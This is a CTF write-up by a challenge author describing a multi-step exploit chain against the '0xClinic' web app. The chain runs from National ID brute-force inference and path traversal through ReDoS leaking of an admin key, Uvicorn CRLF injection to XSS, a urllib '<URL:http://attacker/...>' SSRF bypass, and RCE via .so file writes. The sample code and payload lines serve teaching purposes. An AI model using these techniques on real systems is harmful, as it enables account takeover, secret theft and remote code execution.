Tags: researching 0day web research 

# Exploiting Two 0-Days in 0xL4ugh CTF v5 - 0xClinic

![thumbnail](https://github.com/0xkalawy/My-Challenges-WriteUps/blob/main/0xL4ugh%20CTF%20v5/thumbnail.png?raw=true)

## TL;DR
This challenge requires chaining multiple issues, including two 0-day vulnerabilities that we discovered and reported but that haven't been fixed yet:
- **Password inference** from public data exposed by an API
- **Path traversal**
- **ReDoS**
- **CRLF injection → XSS / cache poisoning / CSP bypass** using a **Uvicorn** n-day
- **SSRF protection bypass** using a **urllib** n-day (scheme validation bypass)
- **RCE** via writing shared object (`.so`) files (technique explained by Siunam)

---

## Introduction
This challenge is inspired by realistic bugs encountered in pentesting and by known n-days in specific products/libraries.
I hope you enjoyed solving it.

---

## Chapter 1 — The Part You Might Hate (Inference)

### Inspiration
The goal is to introduce **inference**: extracting sensitive information by combining multiple public data points.
This is based on a real bug-bounty scenario where an initial password was generated by concatenating the user’s first and last name.

### Vulnerability
In the registration logic, the **National ID** is used as the account password.
So, obtaining the National ID effectively means **account takeover (ATO)**.

To access privileged functionality, we must log in as a **verified account**. Our account is not verified, and there’s no legitimate way to verify it.

An educational link about the Egyptian National ID format was provided:
https://en.wikipedia.org/wiki/Egyptian_National_Identity_Card

From that format, we can infer:
- **Digit 1 (Century):** `2` if born before 2000, `3` otherwise
- **Digits 2–7 (Birthdate):** `YYMMDD`
- **Digits 8–9 (Governorate code):** `01–27` based on place of birth
- **Digits 10–14:** mostly random, except:
  - **Digit 13** is **odd for males** and **even for females**

All of those pieces can be derived from public information.

### Exploitation
By inspecting the application, we find the profile endpoint exposes those “public” fields.
What remains unknown are **5 digits** in the form: `AAABA`:
- `A` is any digit `0–9`
- `B` is constrained:
  - **odd** for males → 5 possibilities
  - **even** for females → 5 possibilities

So we brute-force `10^4 * 5 = 50,000` possibilities (four free digits times five values for the gender digit), which is very feasible.
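As a rough sketch of the candidate generation, assuming the field layout described above: the function name `candidate_ids` and the sample birthdate, governorate code, and gender used with it are hypothetical, and the login request itself is left out.

```python
from datetime import date
from itertools import product

DIGITS = "0123456789"


def candidate_ids(birth: date, governorate: int, male: bool):
    """Yield every 14-digit ID consistent with the public profile fields."""
    century = "2" if birth.year < 2000 else "3"            # digit 1
    prefix = f"{century}{birth:%y%m%d}{governorate:02d}"   # digits 1-9
    gender_digits = "13579" if male else "02468"           # digit 13
    # Digits 10-12 and 14 are free; digit 13 is limited by gender.
    for a, b, c, g, e in product(DIGITS, DIGITS, DIGITS, gender_digits, DIGITS):
        yield prefix + a + b + c + g + e
```

Each yielded string would then be tried as the password for the target account; `sum(1 for _ in candidate_ids(date(1995, 3, 7), 1, True))` gives the 50,000 figure.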

![Public profile fields exposed via API](https://github.com/0xkalawy/My-Challenges-WriteUps/blob/main/0xL4ugh%20CTF%20v5/image.png?raw=true)

---

## Chapter 2 — Every Mystery Starts With a Path Traversal

### Inspiration
Path traversal is often underrated. I’ve seen real cases where it was treated as “low impact,” but it becomes critical when chained.

A similar bug bounty scenario I faced: path traversal in a profile picture endpoint was initially “just DoS” (forcing logout), but it became high impact once chained with endpoints that accept URL parameters (leading to 0-click CSRF-like behavior).

### Vulnerability
A path traversal issue exists in how `username` is used:

```py
data_file = DATA_DIR / username
```

This allows `data_file` to point to arbitrary files on the system.

The intended design was that doctors read and write those files directly on the local system, not through the web app, which is why some example files were provided.
But the web app doesn’t properly constrain `username`, so the file path can escape the intended directory.
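To illustrate why the bare `DATA_DIR / username` join is dangerous, here is a minimal sketch. The `DATA_DIR` value and both function names are hypothetical, and the containment check is only one possible way to constrain the path, not the challenge's code (it needs Python 3.9+ for `is_relative_to`).

```python
from pathlib import Path

DATA_DIR = Path("/srv/clinic/data")  # hypothetical location


def unsafe_data_file(username: str) -> Path:
    # Same join as in the challenge: "../" segments and absolute
    # paths are accepted as-is.
    return DATA_DIR / username


def contained_data_file(username: str) -> Path:
    # One possible fix: resolve the path, then check it is still under DATA_DIR.
    base = DATA_DIR.resolve()
    candidate = (base / username).resolve()
    if not candidate.is_relative_to(base):
        raise ValueError("username escapes the data directory")
    return candidate
```

With `pathlib`, joining an absolute path discards the left-hand side entirely, so `unsafe_data_file("/proc/self/environ")` is simply `/proc/self/environ`.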

---

## ReDoS (2 Years Ago)

### Inspiration
A challenge that took me months to solve ended up being “just a regex issue.” That inspired my ReDoS write-up:
https://medium.com/@kalawy/regex-hacking-redos-cyborg-cybertalents-challenge-write-up-82418d62f1d7

Here, the aim is to demonstrate ReDoS in a realistic application flow.

### Vulnerability
A verified user can send a message to the clinic. The message **title** is treated as a **regex pattern**, and it’s matched against the patient file format to determine which doctor diagnosed an illness.

(An example patient file format was provided in the source code.)
```py
m = search(illness, text)
```
```py
@timeout(2)
def search(r, s):
    return re.match(r, s)
```
See the write-up linked above for the technical details; I won't repeat them here.

### Exploit
When combined with path traversal, we can validate the regex against **any file on the system**, and leak its content through timing/behavior.

Useful target files include:
- Source code (already provided, so not the main target)
- Config files (the app avoids hardcoded secrets; most values are runtime-generated)
- **Process file descriptors (Linux `/proc`)**, which can expose sensitive runtime data

A very valuable target is the environment variables containing `ADMIN_KEY` (used as a cookie).
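The character-by-character leak can be sketched as follows. This is not the solver: `build_probe`, `leak_value`, the `SLOW_TAIL` pattern, and the `timed_out` callback (which would send one message and report whether the 2-second timeout fired) are all assumptions made for illustration. The idea is that a lookahead decides whether the guess is present, and only then does the engine reach a tail that is intended to backtrack heavily. Whether that reliably exceeds the timeout depends on the size of the target file.

```python
import re
import string
from typing import Callable

# Assumed slow tail: nested quantifiers followed by a class that can never match.
SLOW_TAIL = r"(([\s\S]*)*)*[^\s\S]"


def build_probe(candidate: str) -> str:
    """Regex that only reaches the slow tail if `candidate` occurs in the file."""
    return r"(?=[\s\S]*" + re.escape(candidate) + ")" + SLOW_TAIL


def leak_value(
    timed_out: Callable[[str], bool],
    known: str = "ADMIN_KEY=",
    alphabet: str = string.ascii_letters + string.digits,
    max_len: int = 64,
) -> str:
    """Extend the known prefix one character at a time using the timeout oracle."""
    leaked = ""
    while len(leaked) < max_len:
        for ch in alphabet:
            if timed_out(build_probe(known + leaked + ch)):
                leaked += ch
                break
        else:
            break  # no character in the alphabet matched: value is complete
    return leaked
```

A wrong guess fails at the lookahead and returns immediately, so the timeout acts as a one-bit oracle per request.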

> A buddy suggested extracting `JWT_SECRET` via `/proc/<PID>/cmdline`.
> I didn’t fully test this, and it likely fails due to permission constraints and the difficulty of predicting PID reliably.

Helpful reference on file descriptors:
https://medium.com/geekculture/developer-diaries-processes-files-and-file-descriptors-in-linux-ebf007fb78f8

---

## CRLF → XSS / Cache Poisoning / CSP Bypass (N-Days Start Appearing)

### Inspiration
This was inspired by an n-day we discovered with **@ZeyadZonkorany** in **Uvicorn** (FastAPI dependency).
We reported it a long time ago, but it was ignored.

### Vulnerability
The issue leads to CRLF injection due to incorrect regex-based header validation in Uvicorn’s httptools implementation:
https://github.com/Kludex/uvicorn/blob/main/uvicorn/protocols/http/httptools_impl.py

```py
HEADER_RE = re.compile(b'[\x00-\x1f\x7f()<>@,;:[]={} \t\\"]')
HEADER_VALUE_RE = re.compile(b"[\x00-\x08\x0a-\x1f\x7f]")
```

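Because the `]` in `[]` is not escaped, it closes the character class early, and the rest of the pattern is parsed as a literal sequence that must follow the matched character. The header-name check therefore almost never matches, so malicious bytes (including CRLF sequences) can slip through, resulting in **CRLF injection**.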
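The behavior of the header-name pattern can be checked in isolation. In the sketch below, `HEADER_RE` is copied from the snippet above, while `ESCAPED_RE` is our own assumption of what an escaped character class could look like, not an upstream patch.

```python
import re

# Pattern as quoted above: the class ends at the first "]".
HEADER_RE = re.compile(b'[\x00-\x1f\x7f()<>@,;:[]={} \t\\"]')

# Assumed variant with the brackets escaped, so every listed byte is in the class.
ESCAPED_RE = re.compile(rb'[\x00-\x1f\x7f()<>@,;:\[\]={} \t\\"]')

malicious_name = b"X-Test\r\nInjected-Header"

# The original pattern does not flag CR/LF (or even a space) in a header name.
print(HEADER_RE.search(malicious_name))       # None
print(HEADER_RE.search(b"bad name"))          # None

# The escaped variant flags the control characters but accepts a normal name.
print(ESCAPED_RE.search(malicious_name) is not None)  # True
print(ESCAPED_RE.search(b"X-Test"))                   # None
```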

![CRLF behavior observed](https://github.com/0xkalawy/My-Challenges-WriteUps/blob/main/0xL4ugh%20CTF%20v5/image-1.png?raw=true)

### Exploitation
In our environment, this CRLF bug enabled multiple impacts:

1. **CSP bypass**
   CRLF can break `Content-Security-Policy` headers so that they are ignored.

2. **Cache poisoning**
   CRLF can force headers like:
   ```py
   response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
   ```
   to be treated as part of the body. Nginx may then fail to interpret the cache directives and cache responses unexpectedly.

3. **XSS**
   CRLF lets an attacker inject arbitrary body content without proper filtering, enabling XSS.

By chaining these, we can trigger an XSS that affects any user who visits `/api/health`, even unauthenticated users.
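To make the three effects concrete, here is a simplified model of how a response is written to the wire and split by a client or proxy. The helper names, header order, and payload are hypothetical; the sketch assumes the injected header name is emitted before the security headers.

```python
def serialize_response(headers, body):
    """Write status line, headers, blank line, then body (no validation)."""
    lines = [b"HTTP/1.1 200 OK"]
    lines += [name + b": " + value for name, value in headers]
    return b"\r\n".join(lines) + b"\r\n\r\n" + body


def split_like_a_client(raw):
    """Headers end at the first blank line; everything after it is body."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    names = [line.split(b":", 1)[0].strip().lower()
             for line in head.split(b"\r\n")[1:]]
    return names, rest


injected_name = b"X-Echo\r\n\r\n<script>alert(1)</script>"
raw = serialize_response(
    [
        (injected_name, b"1"),
        (b"Content-Security-Policy", b"default-src 'self'"),
        (b"Cache-Control", b"no-cache, no-store, must-revalidate"),
    ],
    b"ok",
)
names, body = split_like_a_client(raw)
print(names)      # only the part of the injected name before the CRLF
print(body[:40])  # body now starts with the injected markup
```

In this model the CSP and `Cache-Control` lines end up inside the body, which matches the CSP bypass and cache poisoning described above, and the injected markup becomes the start of the body.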

---

## Scheme Restriction Bypass (Found ~5 Hours Before the CTF)

### Inspiration
It was the morning of the CTF, so literally a 0-day XD. We were preparing for a journey, and I was casually hacking while commuting when I found it, so I decided to patch the challenge and include it.

### Vulnerability
I observed that `urllib` accepts an “old URL format”:
`<URL:scheme://host:port?/path?>`
Example:
`<URL:http://google.com>`

However, Python’s `urlsplit` behaves unexpectedly with it:

```py
from urllib.parse import urlsplit

urls = ["<URL:http://google.com>", "google.com", "http://google.com"]
for url in urls:
    print(urlsplit(url).scheme if urlsplit(url).scheme else "No scheme")

# No scheme
# No scheme
# http
```

So the old format is interpreted as having **no scheme** by `urlsplit`, even though `urlretrieve` will still fetch it as a URL.

The application performs scheme validation like this:

```py
if urlsplit(file_url).scheme in ["data", "http", "https", "ftp"]:
    return Response(
        content=json.dumps({"status": "error", "message": "Only file:// URLs are allowed"}),
        status_code=400,
        media_type="application/json",
    )

urlretrieve(file_url, UPLOADS_DIR / filename)
return {
    "status": "success",
    "message": "Document reference accepted",
    "filename": filename,
    "file_url": file_url,
}
```

So the validator blocks `http/https/...`, but the “old format” bypasses the check.
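The mismatch can be reproduced without any network access. In this sketch, `denylist_allows` mirrors the check above, while `normalized_scheme` and `is_file_url` are hypothetical helpers showing one possible stricter check: strip the wrapper with `urllib.parse.unwrap` first, then allow only `file`. The host `attacker.example` is a placeholder.

```python
from urllib.parse import unwrap, urlsplit

BLOCKED_SCHEMES = {"data", "http", "https", "ftp"}


def denylist_allows(file_url: str) -> bool:
    # Same logic as the challenge: reject only if the parsed scheme is blocked.
    return urlsplit(file_url).scheme not in BLOCKED_SCHEMES


def normalized_scheme(file_url: str) -> str:
    # Strip the "<URL:...>" wrapper before parsing.
    return urlsplit(unwrap(file_url)).scheme.lower()


def is_file_url(file_url: str) -> bool:
    # Allowlist instead of denylist: anything that is not file:// is refused.
    return normalized_scheme(file_url) == "file"


wrapped = "<URL:http://attacker.example/anyfile>"
print(denylist_allows(wrapped))                       # True: the denylist is bypassed
print(denylist_allows("http://attacker.example/x"))   # False
print(normalized_scheme(wrapped))                     # http
print(is_file_url(wrapped))                           # False
```

The allowlist avoids the whole class of parser disagreements, because an input whose scheme cannot be determined is rejected rather than accepted.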

### Exploit
Using:
`<URL:http://attacker/anyfile>`
bypasses the scheme limitation and allows retrieving remote resources.

> Note: Another solution was to inject a newline (`%0a`) at the beginning of the URL to break parsing in the validation logic.

---

## Path Traversal + File Upload → RCE (A Good Chain Ends With Code Execution)

### Inspiration
We wanted to end the chain with a satisfying RCE, so we used Siunam’s technique that leverages writing a malicious `.so` file into a Python environment.

### Vulnerability
At this stage, we have a restricted file upload with path traversal:
- Upload is limited by extension
- But path traversal can place the file in an attacker-chosen location

To turn arbitrary file write into RCE in Python, one reliable approach is:
- Writing shared object (`.so`) files to hijack/override Python import behavior or related mechanisms

Full technique details (already documented):
https://siunam321.github.io/research/python-dirty-arbitrary-file-write-to-rce-via-writing-shared-object-files-or-overwriting-bytecode-files/

---

## Wrapping It Up (Exploit Chain Summary)

1. **Infer the National ID** (password inference)
2. **Path traversal + ReDoS** to leak `ADMIN_KEY`
3. **CRLF injection** → CSP bypass + cache poisoning + XSS
4. **Bypass scheme validation** to achieve SSRF + controlled file retrieval/upload reference
5. Use path traversal to upload a malicious `.so` that overrides a bot functionality
6. Trigger the bot again to reach **RCE**

> I ran into some issues while writing my exploit. For example, the body is converted to lowercase, so you will see that I replaced capital characters with their hex values.

Here is my solver: https://github.com/0xkalawy/My-Challenges-WriteUps/blob/main/0xL4ugh%20CTF%20v5/solver.py

Original writeup (https://github.com/0xkalawy/My-Challenges-WriteUps/blob/main/0xL4ugh%20CTF%20v5/0xClinic.md).